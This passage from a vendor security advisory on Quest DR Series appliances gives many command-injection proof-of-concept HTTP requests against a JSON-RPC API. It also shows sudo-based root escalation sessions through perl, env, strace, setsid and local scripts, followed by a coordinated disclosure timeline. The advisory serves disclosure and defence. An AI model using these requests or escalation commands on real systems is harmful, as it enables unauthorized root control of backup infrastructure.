-----/ 7.30. *Command injection in the set hostname method* [CVE-2018-11172] The system hostname can be updated via the 'HostnameService' exposed functionality. Request parameters are not sanitized. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 104 Connection: close { "jsonrpc": "2.0", "method": "set", "params": { "classname": "DRHostname", "hostname": "; sleep 10; #" }, "id": 1 } -----/ 7.31. *Command injection in the add email alert method* [CVE-2018-11173] Attackers can inject system commands by requesting to add an email alert and providing a malicious email address containing the payload. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 112 Connection: close { "jsonrpc": "2.0", "method": "add", "params": { "classname": "DREmailAlerts", "emailAddress": "'; sleep 10; #" }, "id": 1 } -----/ 7.32. *Command injection in the delete email alert method* [CVE-2018-11174] Analogous to the email alert 'add' subroutine, the 'delete' email alert counterpart is also vulnerable to command injection because of an unsanitized email address parameter. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 115 Connection: close { "jsonrpc": "2.0", "method": "delete", "params": { "classname": "DREmailAlerts", "emailAddress": "'; sleep 10; #" }, "id": 1 } -----/ 7.33. *Command injection in the setBandwidthLimit method* [CVE-2018-11175] The DR series appliance can be configured to enforce different limits over the network traffic. This functionality is handled by the 'NetworkInterfacesServices' module and its 'setBandwidthLimit' subroutine was found to be vulnerable to command injection. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 154 Connection: close { "jsonrpc": "2.0", "method": "setBandwidthLimit", "params": { "classname": "DRNetworkInterface", "bandwidthUnit": "default", "targetIp": "; sleep 10; #" }, "id": 1 } -----/ 7.34. *Command injection in the set_passphrase method* [CVE-2018-11176] A DR series system can be configured to use encryption at rest. The method that sets the passphrase can be abused by attackers to execute arbitrary system commands. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 119 Connection: close { "jsonrpc": "2.0", "method": "set_passphrase", "params": { "classname": "DREncryption", "passphrase": "; sleep 10; #" }, "id": 1 } -----/ 7.35. *Command injection in the set_encryption_settings method* [CVE-2018-11177] Different encryption settings can be configured, such as the encryption mode and the key rotation interval. These parameters are taken from the user generated request and used as components of a command string, therefore allowing attackers to inject arbitrary system commands. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 128 Connection: close { "jsonrpc": "2.0", "method": "set_encryption_settings", "params": { "classname": "DREncryption", "encryption": "; sleep 10; #" }, "id": 1 } -----/ 7.36. *Command injection in the start_filesystem method* [CVE-2018-11178] Several features implemented in the 'StartupPassphraseService' module were found to be vulnerable to command injection. In particular, the 'start_filesystem' subroutine takes a user supplied passphrase to construct a system command. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 129 Connection: close { "jsonrpc": "2.0", "method": "start_filesystem", "params": { "classname": "DRStartupPassphrase", "passphrase": "'; sleep 10; #" }, "id": 1 } -----/ 7.37. *Command injection in the save_configuration method* [CVE-2018-11179] Saving startup configuration was also found to be prone to command injection issues. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 151 Connection: close { "jsonrpc": "2.0", "method": "save_configuration", "params": { "classname": "DRStartupPassphrase", "status": "pepito", "passphrase": "'; sleep 10; #" }, "id": 1 } -----/ 7.38. *Command injection in the cloud portal register method* [CVE-2018-11180] The 'CloudPortal' module allows to register an agent with the cloud portal system. Its 'register' subroutine was found to be vulnerable to command injection via the 'registrationCode' request parameter. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 120 Connection: close { "jsonrpc": "2.0", "method": "register", "params": { "classname": "DRCloudPortal", "registrationCode": "; sleep 10; #" }, "id": 1 } -----/ 7.39. *Command injection in the customer portal register method* [CVE-2018-11181] The subroutine in charge of registering the DR series appliance with the Quest Customer Portal could be abused by an authenticated attacker to execute system commands via a specially crafted 'token' request parameter. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 112 Connection: close { "jsonrpc": "2.0", "method": "register", "params": { "classname": "DRCustomerPortal", "token": "; sleep 10; #" }, "id": 1 } -----/ 7.40. *Command injection in the customer portal changeManageBtn method* [CVE-2018-11182] Customer portal integration supports changing the manage button action. This functionality was found to be vulnerable via the 'action' parameter. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 120 Connection: close { "jsonrpc": "2.0", "method": "changeManageBtn", "params": { "classname": "DRCustomerPortal", "action": "; sleep 10; #" }, "id": 1 } -----/ 7.41. *Command injection in the set DNS method* [CVE-2018-11183] The 'set' subroutine in the 'DnsService' module allows users to configure the DNS servers used. When setting new DNS server configuration, several user supplied parameters are used to build a command line string without applying any sanitization, therefore leading to command injection. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 101 Connection: close { "jsonrpc": "2.0", "method": "set", "params": { "classname": "DRDns", "dns_suffix": "; sleep 10; #" }, "id": 1 } -----/ 7.42. *Command injection in the get usage method* [CVE-2018-11184] The 'UsageService' module allows administrators to monitor system usage. A single subroutine processes the user's query and returns the corresponding statistics. The following proof of concept exploits the 'usage' type. /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 114 Connection: close { "jsonrpc": "2.0", "method": "get", "params": { "classname": "DRUsage", "type": "usage", "width": "; sleep 10; #" }, "id": 1 } -----/ 7.43. *Command injection in the support portal register method* [CVE-2018-11185] DR series systems can be registered with the Quest Support Portal. Registered systems collect certain information such as operational statistics, performance metrics, diagnostic information and configuration settings, which are then transmitted to Quest in order to help troubleshoot system problems. The subroutine implementing the registration functionality with the Support Portal was found to be vulnerable to command injection via the 'email' parameter. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 111 Connection: close { "jsonrpc": "2.0", "method": "register", "params": { "classname": "DRSupportPortal", "email": "; sleep 10; #" }, "id": 1 } -----/ 7.44. *Command injection in the setDateAndTime method* [CVE-2018-11186] Attackers can execute arbitrary system commands by configuring a custom timezone. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 115 Connection: close { "jsonrpc": "2.0", "method": "setDateAndTime", "params": { "classname": "DRDateTime", "timezone": "; sleep 10; #" }, "id": 1 } -----/ 7.45. *Command injection in the global view add_member method* [CVE-2018-11187] GlobalView is a dashboard view providing a global picture of all the DR Series systems in an organization. The functionality to add a new system was found to be vulnerable to command injection via the 'RemoteHost' parameter. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 165 Connection: close { "jsonrpc": "2.0", "method": "add_member", "params": { "classname": "DRGlobalView", "UserName": "pepito", "Password": "pepito123", "RemoteHost": "; sleep 10; echo " }, "id": 1 } -----/ 7.46. *Command injection in the global view reconnect_member method* [CVE-2018-11188] Reconnecting a disconnected system in the Global View page can also result in arbitrary command execution. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 171 Connection: close { "jsonrpc": "2.0", "method": "reconnect_member", "params": { "classname": "DRGlobalView", "UserName": "pepito", "Password": "pepito123", "RemoteHost": "; sleep 10; echo " }, "id": 1 } -----/ 7.47. *Privilege escalation from web server user to root via perl* [CVE-2018-11189] The web server is running as the webadmin user. Exploiting any of the command injection vulnerabilities oulined in the previous sections would then result in 'webadmin' level access. The webadmin user has sudo access to run the perl interpreter as root, presumably to operate the various scripts that are called from the web application. However, this means that an attacker who manages to execute code in the context of the web server can easily escalate user privileges to root by running arbitrary code via the perl interpreter. /----- sh-3.2$ id uid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin) sh-3.2$ sudo perl -e 'system("/bin/bash")' id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) -----/ 7.48. *Privilege escalation from web server user to root via env* [CVE-2018-11190] The webadmin user has sudo access to run the /bin/env binary with root permissions, resulting in direct privilege escalation. /----- webadmin@dr2k-1thv-dsmoke-01 > sudo env -i /bin/sh sh-3.2# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) -----/ 7.49. *Privilege escalation from web server user to root via local scripts* [CVE-2018-11191] The webadmin user is allowed to run local configuration scripts located in /usr/local/bin with root level permissions and without requiring a password. In particular, there is an 'exec.sh' shell script that allows users to execute arbitrary commands. Because it can be run via sudo, this results once again in privilege escalation to root. /----- webadmin@dr2k-1thv-dsmoke-01 > id uid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin) webadmin@dr2k-1thv-dsmoke-01 > sudo /usr/local/bin/exec.sh /bin/bash NOTICE: To capture 'service' session output please use 'capture' command. Type 'exit' to stop the capture. Total alert messages : 0 service@dr2k-1thv-dsmoke-01 > id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) -----/ 7.50. *Privilege escalation from web server user to root via strace* [CVE-2018-11192] The strace binary can be run by the webadmin user with root privileges. In reality, this means that arbitrary processes are run as root, opening another vector to escalate privileges once the web server is compromised. /----- webadmin@dr2k-1thv-dsmoke-01 > id uid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin) webadmin@dr2k-1thv-dsmoke-01 > sudo strace /usr/bin/id [...] read(3, "root:x:0:root,admin,administrato"..., 4096) = 731 close(3) = 0 munmap(0x2ba34633d000, 4096) = 0 write(1, "uid=0(root) gid=0(root) groups=0"..., 88uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) ) = 88 close(1) = 0 munmap(0x2ba34633c000, 4096) = 0 exit_group(0) = ? -----/ 7.51. *Privilege escalation from web server user to root via ocashell* [CVE-2018-11193] The ocashell script located in the /usr/local/bin directory spawns a bash shell and can be executed by the webadmin user via sudo. This results in a command line shell with root privileges. /----- webadmin@dr2k-1thv-dsmoke-01 > sudo /usr/local/bin/ocashell NOTICE: To capture 'service' session output please use 'capture' command. Type 'exit' to stop the capture. Total alert messages : 0 service@dr2k-1thv-dsmoke-01 > id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) -----/ 7.52. *Privilege escalation from web server user to root via setsid* [CVE-2018-11194] Another command that can be run via sudo once code execution as the webadmin user is achieved is the /usr/bin/setsid binary. This binary is used to run a program in a new session, resulting in local privilege escalation to root. /----- webadmin@dr2k-1thv-dsmoke-01 > sudo /usr/bin/setsid id > /tmp/pepito webadmin@dr2k-1thv-dsmoke-01 > cat /tmp/pepito uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) -----/ 8. *Report Timeline* 2018-01-31: Core Security sent an initial notification to Quest Software Inc. (Quest), asking for GPG keys in order to send draft advisory. 2018-01-31: Quest Support answered asking for the advisory in clear text. 2018-01-31: Core Security sent the draft advisory in clear text form. 2018-01-31: Quest Support replied that they received the draft advisory and that they would review it. 2018-02-07: Core Security requested an update from Quest regarding the reported vulnerabilities and a tentative schedule. 2018-02-07: Quest Support answered that it opened a bug id to track the fixes and asked Core Security for a tentative publication date. 2018-02-07: Core Security answered saying that its intention is to coordinate the release in conjunction adjusting the schedule to the Quest's development timeline. 2018-02-08: Quest Support replied that engineering is testing the fixes and they should have an estimate timeline the week of 12 February. 2018-02-15: Core Security requested a status update. 2018-02-22: Core Security again requested a status update and an estimated timescale. 2018-02-22: Quest Support answered that it is trying to get an update from the engineering team. 2018-03-01: Core Security requested a status update and a solidified timeline. 2018-03-01: Quest Support replied saying that engineering is planning to have a patch ready by the end of March. 2018-03-01: Core Security thanked the follow up and replied saying that it will contact Quest in two weeks. 2018-03-15: Core Security requested a status update. 2018-03-26: Core Security requested a status update again. 2018-03-26: Quest Support answered saying it will get an update from the engineering team. 2018-04-10: Quest Support informed that the latest build 4.0.3.1 addresses the vulnerabilities that were reported. 2018-04-10: Core Security asked if all the vulnerabilities reported are addressed by this build. 2018-05-31: Advisory CORE-2018-0002 published. 9. *References* [1] https://www.quest.com/products/dr-series-disk-backup-appliances/ 10. *About CoreLabs* CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security* Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. *Disclaimer* The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.